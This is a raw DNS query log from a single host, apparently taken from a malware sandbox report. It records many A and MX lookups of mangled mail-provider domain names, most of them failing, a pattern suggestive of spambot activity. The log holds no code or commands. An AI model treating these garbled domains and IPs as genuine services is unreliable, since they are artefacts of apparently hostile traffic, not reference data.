Nov 30, 2023 11:22:34.657166958 CET	1.1.1.1	192.168.2.4	0x9b75	Name error (3)	tbsayail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.658138990 CET	1.1.1.1	192.168.2.4	0x307f	No error (0)	nrnet.com		104.238.144.219	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.659992933 CET	1.1.1.1	192.168.2.4	0x6334	Name error (3)	gbivlporollm.cz	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.693639994 CET	1.1.1.1	192.168.2.4	0xd598	Name error (3)	phcg87k6barre352odseba.dcivenail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.704634905 CET	1.1.1.1	192.168.2.4	0x916a	Name error (3)	gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.723628044 CET	1.1.1.1	192.168.2.4	0xd6c3	Name error (3)	1rz.ramal.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.724642992 CET	1.1.1.1	192.168.2.4	0xdffd	Name error (3)	mess.ck	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.724864960 CET	1.1.1.1	192.168.2.4	0xe59c	No error (0)	yahpl.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.724864960 CET	1.1.1.1	192.168.2.4	0xe59c	No error (0)	yahpl.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.724864960 CET	1.1.1.1	192.168.2.4	0xe59c	No error (0)	yahpl.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.724864960 CET	1.1.1.1	192.168.2.4	0xe59c	No error (0)	yahpl.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.724864960 CET	1.1.1.1	192.168.2.4	0xe59c	No error (0)	yahpl.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.734184027 CET	1.1.1.1	192.168.2.4	0x7283	Name error (3)	daytonpubhocso.cog	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.744321108 CET	1.1.1.1	192.168.2.4	0xe081	Name error (3)	kni.ol168.ecom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.746973991 CET	1.1.1.1	192.168.2.4	0x92fa	Name error (3)	ochcar.cin4g9tdamn.bagcom	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.749258995 CET	1.1.1.1	192.168.2.4	0xf19a	Name error (3)	ser711a.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.756489992 CET	1.1.1.1	192.168.2.4	0xd907	Name error (3)	getococuail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.792620897 CET	1.1.1.1	192.168.2.4	0xa163	Name error (3)	comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.799757957 CET	1.1.1.1	192.168.2.4	0xf7f9	Name error (3)	yah23051987hont.net	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.806235075 CET	1.1.1.1	192.168.2.4	0x8f60	Name error (3)	sgt9o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.808548927 CET	1.1.1.1	192.168.2.4	0x454a	Server failure (2)	h4y.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.826560020 CET	1.1.1.1	192.168.2.4	0x35	Name error (3)	rhacmtu.au	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.868264914 CET	1.1.1.1	192.168.2.4	0x4dfa	Name error (3)	a.o.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.881367922 CET	1.1.1.1	192.168.2.4	0xab9c	No error (0)	gco.uk		213.171.212.244	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.899733067 CET	1.1.1.1	192.168.2.4	0x6134	No error (0)	hna.be		3.33.224.147	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.900862932 CET	1.1.1.1	192.168.2.4	0x1f7a	Name error (3)	e.gr	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.929900885 CET	1.1.1.1	192.168.2.4	0x8913	No error (0)	apee.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.957376003 CET	1.1.1.1	192.168.2.4	0x612f	No error (0)	gmaso.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:35.180561066 CET	1.1.1.1	192.168.2.4	0xaa35	No error (0)	il.cm	i.17986.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:22:35.310201883 CET	1.1.1.1	192.168.2.4	0xdd5d	Name error (3)	hl.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:35.316317081 CET	1.1.1.1	192.168.2.4	0xd21c	Name error (3)	comcamm.net	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:35.384241104 CET	1.1.1.1	192.168.2.4	0xe3e5	Name error (3)	acooil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:35.400794983 CET	1.1.1.1	192.168.2.4	0x720c	Name error (3)	mn.ch	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:35.471273899 CET	1.1.1.1	192.168.2.4	0x9e12	No error (0)	noweco.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:35.861252069 CET	1.1.1.1	192.168.2.4	0x4b84	Name error (3)	ytcjmiil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:35.861658096 CET	1.1.1.1	192.168.2.4	0x57c0	Name error (3)	t.ahlfth	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.307313919 CET	1.1.1.1	192.168.2.4	0x4b84	Name error (3)	ytcjmiil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.309076071 CET	1.1.1.1	192.168.2.4	0x80c3	Name error (3)	rambojoocta.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.311645985 CET	1.1.1.1	192.168.2.4	0xb02	Name error (3)	yahpn.yb	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.311789036 CET	1.1.1.1	192.168.2.4	0x40cf	Name error (3)	n.n.amdiu	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.312066078 CET	1.1.1.1	192.168.2.4	0x2335	Name error (3)	buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.313155890 CET	1.1.1.1	192.168.2.4	0xd2cd	Name error (3)	yahio.comcm	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.313457012 CET	1.1.1.1	192.168.2.4	0xd43e	Name error (3)	yahnt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.314491034 CET	1.1.1.1	192.168.2.4	0xd3b0	Name error (3)	gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.314702988 CET	1.1.1.1	192.168.2.4	0x3c5a	Name error (3)	acesineuiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.316083908 CET	1.1.1.1	192.168.2.4	0x5f08	Name error (3)	acesineuiw.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.316370964 CET	1.1.1.1	192.168.2.4	0x6ad4	Name error (3)	as.hauet	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.320342064 CET	1.1.1.1	192.168.2.4	0x878c	Name error (3)	nnblmogblmoglil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.320873976 CET	1.1.1.1	192.168.2.4	0x57c0	Name error (3)	t.ahlfth	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.321063042 CET	1.1.1.1	192.168.2.4	0xc353	Name error (3)	h333ol03t8rwslive21lok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.322153091 CET	1.1.1.1	192.168.2.4	0x2744	Name error (3)	caatholiomissa.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.322273970 CET	1.1.1.1	192.168.2.4	0x5328	Name error (3)	gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.322292089 CET	1.1.1.1	192.168.2.4	0xcb4a	Name error (3)	ezi.adompany.at	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.323287010 CET	1.1.1.1	192.168.2.4	0x5c82	No error (0)	ia.eu		199.59.243.225	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.323788881 CET	1.1.1.1	192.168.2.4	0xf438	Name error (3)	yahfll.ianus	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.324070930 CET	1.1.1.1	192.168.2.4	0x58ad	Name error (3)	loaquorezcil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.324315071 CET	1.1.1.1	192.168.2.4	0xb130	Name error (3)	acooil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.324572086 CET	1.1.1.1	192.168.2.4	0x98ce	Name error (3)	yahio.comcm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.324589014 CET	1.1.1.1	192.168.2.4	0x9266	Name error (3)	hotmea1aia.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.324968100 CET	1.1.1.1	192.168.2.4	0x441a	Name error (3)	ayls.xcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.325176001 CET	1.1.1.1	192.168.2.4	0x4572	Name error (3)	asail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.325207949 CET	1.1.1.1	192.168.2.4	0xf745	Name error (3)	t.ahlfth	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.325907946 CET	1.1.1.1	192.168.2.4	0xc76d	Name error (3)	ser711a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.325926065 CET	1.1.1.1	192.168.2.4	0x2a3	Name error (3)	mn.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.325942039 CET	1.1.1.1	192.168.2.4	0xb2dd	Name error (3)	a.o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.326297998 CET	1.1.1.1	192.168.2.4	0x3fbd	Name error (3)	ochcar.cin4g9tdamn.bagcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.326649904 CET	1.1.1.1	192.168.2.4	0xfeea	Name error (3)	yahwoooie2ampu.comsh	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.327234030 CET	1.1.1.1	192.168.2.4	0x6e5a	Name error (3)	yah23051987hont.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.327477932 CET	1.1.1.1	192.168.2.4	0x7ea6	Name error (3)	oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.328413963 CET	1.1.1.1	192.168.2.4	0xe0bc	Name error (3)	s.ddo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.328550100 CET	1.1.1.1	192.168.2.4	0x8943	Name error (3)	gmai76afmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.328627110 CET	1.1.1.1	192.168.2.4	0x7d6d	Name error (3)	pyctl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.328797102 CET	1.1.1.1	192.168.2.4	0x6389	No error (0)	gcann.cr.co.uk		3.64.163.50	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.328974962 CET	1.1.1.1	192.168.2.4	0x824	Name error (3)	lyco2.comom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.329056025 CET	1.1.1.1	192.168.2.4	0x46c0	Name error (3)	yahgr.neaco	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.329978943 CET	1.1.1.1	192.168.2.4	0x6041	Name error (3)	yahjl.cxs	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.330102921 CET	1.1.1.1	192.168.2.4	0x57c2	Name error (3)	horadguc1995l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.330635071 CET	1.1.1.1	192.168.2.4	0x360a	Name error (3)	h2.spainvil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.331989050 CET	1.1.1.1	192.168.2.4	0xa942	Name error (3)	n.n.amdiu	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.332753897 CET	1.1.1.1	192.168.2.4	0x371b	No error (0)	bjail.com	traff-1.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:22:36.332753897 CET	1.1.1.1	192.168.2.4	0x371b	No error (0)	traff-1.hugedomains.com	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:22:36.332753897 CET	1.1.1.1	192.168.2.4	0x371b	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		54.209.32.212	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.332753897 CET	1.1.1.1	192.168.2.4	0x371b	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		52.71.57.184	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.332787037 CET	1.1.1.1	192.168.2.4	0xa428	No error (0)	m7l.com		15.197.142.173	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.332787037 CET	1.1.1.1	192.168.2.4	0xa428	No error (0)	m7l.com		3.33.152.147	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.332803965 CET	1.1.1.1	192.168.2.4	0xa305	No error (0)	smtp.secureserver.net		216.69.141.81	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.332803965 CET	1.1.1.1	192.168.2.4	0xa305	No error (0)	smtp.secureserver.net		68.178.213.37	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.332803965 CET	1.1.1.1	192.168.2.4	0xa305	No error (0)	smtp.secureserver.net		68.178.213.203	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.333864927 CET	1.1.1.1	192.168.2.4	0x3e0f	No error (0)	gmo.uk		3.64.163.50	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.334034920 CET	1.1.1.1	192.168.2.4	0xff09	Name error (3)	comcamm.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.336247921 CET	1.1.1.1	192.168.2.4	0x3f27	Name error (3)	sbcglob4m.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.337340117 CET	1.1.1.1	192.168.2.4	0x1914	Name error (3)	sbcgloboo.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.338613033 CET	1.1.1.1	192.168.2.4	0xb0cb	Name error (3)	geu015naryo-uail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.339065075 CET	1.1.1.1	192.168.2.4	0x7d01	Name error (3)	as.r.upze	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.339220047 CET	1.1.1.1	192.168.2.4	0x3dba	No error (0)	gr.2mail.com		192.99.158.243	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.339596033 CET	1.1.1.1	192.168.2.4	0xd0f6	Name error (3)	gez542l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.341299057 CET	1.1.1.1	192.168.2.4	0xc163	Name error (3)	jubo.cath	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.341922998 CET	1.1.1.1	192.168.2.4	0xce2b	Name error (3)	ee.idbo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.344136000 CET	1.1.1.1	192.168.2.4	0xd2ea	Name error (3)	7.dceilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.344983101 CET	1.1.1.1	192.168.2.4	0x8ca6	Name error (3)	hgaarnlundejl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.345310926 CET	1.1.1.1	192.168.2.4	0x1d19	Name error (3)	yahao.lsa	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.345381021 CET	1.1.1.1	192.168.2.4	0xdc6b	Name error (3)	e-fja8mso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.345854998 CET	1.1.1.1	192.168.2.4	0xef77	Name error (3)	wn26lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.346942902 CET	1.1.1.1	192.168.2.4	0xfc52	Name error (3)	ho10a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.347203970 CET	1.1.1.1	192.168.2.4	0xbbe1	Name error (3)	f.nyhm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.347222090 CET	1.1.1.1	192.168.2.4	0xa93a	Name error (3)	h2.spainvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.347311020 CET	1.1.1.1	192.168.2.4	0x4a5e	Name error (3)	yahe.nen	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.347750902 CET	1.1.1.1	192.168.2.4	0xf543	No error (0)	6ail.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.347750902 CET	1.1.1.1	192.168.2.4	0xf543	No error (0)	6ail.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.353290081 CET	1.1.1.1	192.168.2.4	0xb4f3	Name error (3)	qebyte.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.353993893 CET	1.1.1.1	192.168.2.4	0x2f68	No error (0)	96l.com		15.197.204.56	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.353993893 CET	1.1.1.1	192.168.2.4	0x2f68	No error (0)	96l.com		3.33.243.145	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.363354921 CET	1.1.1.1	192.168.2.4	0x3534	Name error (3)	gmai76afmail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.364605904 CET	1.1.1.1	192.168.2.4	0xd79c	Name error (3)	yahnt.net	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.377222061 CET	1.1.1.1	192.168.2.4	0xa2fb	Name error (3)	il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.380695105 CET	1.1.1.1	192.168.2.4	0x1eeb	Name error (3)	cucumbnr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.387443066 CET	1.1.1.1	192.168.2.4	0x86b4	Name error (3)	aomttdl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.388103008 CET	1.1.1.1	192.168.2.4	0x1c5e	No error (0)	ct.ated.net		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.388103008 CET	1.1.1.1	192.168.2.4	0x1c5e	No error (0)	ct.ated.net		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.388309956 CET	1.1.1.1	192.168.2.4	0xdf11	No error (0)	a6a.com		15.197.142.173	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.388309956 CET	1.1.1.1	192.168.2.4	0xdf11	No error (0)	a6a.com		3.33.152.147	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.391757965 CET	1.1.1.1	192.168.2.4	0x2610	Name error (3)	deptka7ffmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.392963886 CET	1.1.1.1	192.168.2.4	0xbc2	Name error (3)	feoio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.397015095 CET	1.1.1.1	192.168.2.4	0x6931	Name error (3)	ytcjmiil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.397680044 CET	1.1.1.1	192.168.2.4	0xe477	No error (0)	1.tv		15.197.172.60	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.400185108 CET	1.1.1.1	192.168.2.4	0x6c57	No error (0)	bjail.com	traff-1.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:22:36.400185108 CET	1.1.1.1	192.168.2.4	0x6c57	No error (0)	traff-1.hugedomains.com	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:22:36.419622898 CET	1.1.1.1	192.168.2.4	0x2dc3	Name error (3)	he0114zusmg454lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.421382904 CET	1.1.1.1	192.168.2.4	0x3475	Name error (3)	ez786-lcolwicn.coofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.423253059 CET	1.1.1.1	192.168.2.4	0x2e56	Name error (3)	yahgt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.431924105 CET	1.1.1.1	192.168.2.4	0x3207	Name error (3)	gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.441551924 CET	1.1.1.1	192.168.2.4	0x1454	No error (0)	onlist.com		192.99.158.243	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.442962885 CET	1.1.1.1	192.168.2.4	0x66e0	No error (0)	ct.ated.net			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.450573921 CET	1.1.1.1	192.168.2.4	0xfcec	Name error (3)	rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.452747107 CET	1.1.1.1	192.168.2.4	0x62a1	Name error (3)	klp.tn	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.461607933 CET	1.1.1.1	192.168.2.4	0xbac1	Server failure (2)	rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.470299959 CET	1.1.1.1	192.168.2.4	0xb561	Name error (3)	fldie12.jdgwcollfaaba.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.472466946 CET	1.1.1.1	192.168.2.4	0xca24	Name error (3)	syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.472544909 CET	1.1.1.1	192.168.2.4	0x3b77	No error (0)	gbya.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.509219885 CET	1.1.1.1	192.168.2.4	0xe163	Name error (3)	slyvor.as290a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.510634899 CET	1.1.1.1	192.168.2.4	0x812	No error (0)	z-a.com		194.63.248.47	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.517302990 CET	1.1.1.1	192.168.2.4	0x844a	No error (0)	apee.com		64.190.63.111	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.520673990 CET	1.1.1.1	192.168.2.4	0x2bec	No error (0)	cm.cz			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.534573078 CET	1.1.1.1	192.168.2.4	0x3c22	No error (0)	noweco.com		216.37.42.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.556592941 CET	1.1.1.1	192.168.2.4	0x5b3e	Name error (3)	mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.560873985 CET	1.1.1.1	192.168.2.4	0xdd43	Name error (3)	il.om	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.578903913 CET	1.1.1.1	192.168.2.4	0xfbc2	No error (0)	cm.cz		104.247.82.52	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.580423117 CET	1.1.1.1	192.168.2.4	0x16e5	No error (0)	hul.co.uk		68.183.34.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.602849960 CET	1.1.1.1	192.168.2.4	0xe185	Name error (3)	e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.664302111 CET	1.1.1.1	192.168.2.4	0xbc91	No error (0)	gmaso.com		157.7.44.171	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.664546967 CET	1.1.1.1	192.168.2.4	0xce90	Name error (3)	m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.672090054 CET	1.1.1.1	192.168.2.4	0x60f	No error (0)	san.ee		145.14.30.248	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.694269896 CET	1.1.1.1	192.168.2.4	0xb1c0	Name error (3)	1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.739487886 CET	1.1.1.1	192.168.2.4	0x6ad4	Server failure (2)	h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.785218954 CET	1.1.1.1	192.168.2.4	0x1cb7	No error (0)	il.cm	i.17986.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:22:36.785218954 CET	1.1.1.1	192.168.2.4	0x1cb7	No error (0)	i.17986.net		67.21.93.254	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.068094015 CET	1.1.1.1	192.168.2.4	0xfbc2	No error (0)	cm.cz		104.247.82.52	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.068428993 CET	1.1.1.1	192.168.2.4	0x16e5	No error (0)	hul.co.uk		68.183.34.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.068483114 CET	1.1.1.1	192.168.2.4	0xe163	Name error (3)	slyvor.as290a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.068519115 CET	1.1.1.1	192.168.2.4	0xca24	Name error (3)	syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.068552017 CET	1.1.1.1	192.168.2.4	0x3c22	No error (0)	noweco.com		216.37.42.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.068583965 CET	1.1.1.1	192.168.2.4	0x2bec	No error (0)	cm.cz			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:37.068617105 CET	1.1.1.1	192.168.2.4	0x844a	No error (0)	apee.com		64.190.63.111	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.068650007 CET	1.1.1.1	192.168.2.4	0xdd43	Name error (3)	il.om	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:37.068681955 CET	1.1.1.1	192.168.2.4	0x3b77	No error (0)	gbya.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.068715096 CET	1.1.1.1	192.168.2.4	0x1cb7	No error (0)	il.cm	i.17986.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:22:37.068715096 CET	1.1.1.1	192.168.2.4	0x1cb7	No error (0)	i.17986.net		67.21.93.254	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.068778992 CET	1.1.1.1	192.168.2.4	0xcb4a	Name error (3)	ezi.adompany.at	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.069221973 CET	1.1.1.1	192.168.2.4	0xe185	Name error (3)	e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.069240093 CET	1.1.1.1	192.168.2.4	0xbc91	No error (0)	gmaso.com		157.7.44.171	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.069318056 CET	1.1.1.1	192.168.2.4	0x6ad4	Server failure (2)	h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.069331884 CET	1.1.1.1	192.168.2.4	0x3f27	Name error (3)	sbcglob4m.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.069376945 CET	1.1.1.1	192.168.2.4	0xce90	Name error (3)	m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.069766045 CET	1.1.1.1	192.168.2.4	0x812	No error (0)	z-a.com		194.63.248.47	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.069798946 CET	1.1.1.1	192.168.2.4	0x60f	No error (0)	san.ee		145.14.30.248	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.069935083 CET	1.1.1.1	192.168.2.4	0x5b3e	Name error (3)	mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.069968939 CET	1.1.1.1	192.168.2.4	0xb1c0	Name error (3)	1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
